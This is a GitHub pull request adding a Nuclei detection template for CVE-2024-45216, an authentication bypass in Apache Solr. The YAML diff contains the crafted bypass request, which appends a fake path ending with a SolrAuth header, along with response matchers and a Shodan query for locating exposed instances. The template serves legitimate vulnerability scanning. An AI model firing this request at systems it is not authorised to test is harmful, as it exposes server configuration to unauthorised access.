### PR TITLE
CVE-2024-45216 (Apache Solr - Authentication Bypass 🔥 )

### DIFF
--- a/http/cves/2024/CVE-2024-45216.yaml
+++ b/http/cves/2024/CVE-2024-45216.yaml
@@ -1,0 +1,28 @@
+id: CVE-2024-45216
+
+info:
+  name: Authentication bypass in Apache Solr
+  author: gumgum
+  severity: critical
+  description: Apache Solr before 9.7.0 allows an attacker to bypass authentication via a crafted HTTP request.
+  reference:
+    - https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-45216
+    - https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
+  tags: apache, solr, authentication bypass
+
+http:
+  - raw:
+      - |
+        GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+        SolrAuth: gumgum
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "responseHeader"
+          - "system.properties"
+        condition: and

--- a/http/cves/2024/CVE-2024-45216.yaml
+++ b/http/cves/2024/CVE-2024-45216.yaml
@@ -1,28 +1,53 @@
 id: CVE-2024-45216
 
 info:
-  name: Authentication bypass in Apache Solr
+  name: Apache Solr - Authentication Bypass
   author: gumgum
   severity: critical
-  description: Apache Solr before 9.7.0 allows an attacker to bypass authentication via a crafted HTTP request.
+  description: |
+    Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.
+  impact: |
+    Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.
   reference:
     - https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr
     - https://nvd.nist.gov/vuln/detail/CVE-2024-45216
-    - https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
-  tags: apache, solr, authentication bypass
+    - https://solr.apache.org/security html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-45216
+    cwe-id: CWE-863,CWE-287
+    epss-score: 0.00043
+    epss-percentile: 0.09834
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"Apache Solr"
+  tags: cve,cve2024,apache,solr,auth-bypass
 
 http:
   - raw:
       - |
         GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
-        SolrAuth: gumgum
+        SolrAuth: {{to_lower(rand_text_alpha(5))}}
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "responseHeader"
           - "system.properties"
+          - "solr.script"
+          - "solr.solr.home"
         condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

Added CVE-2024-45216 Apache Solr Authentication Bypass

This PR adds a new Nuclei template to detect CVE-2024-45216, an authentication bypass vulnerability in Apache Solr below 9.7.0.

- References:
         https://nvd.nist.gov/vuln/detail/CVE-2024-45216
         https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
         https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

![image](https://github.com/user-attachments/assets/c8ff8da1-8894-4330-9869-d42600344879)


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)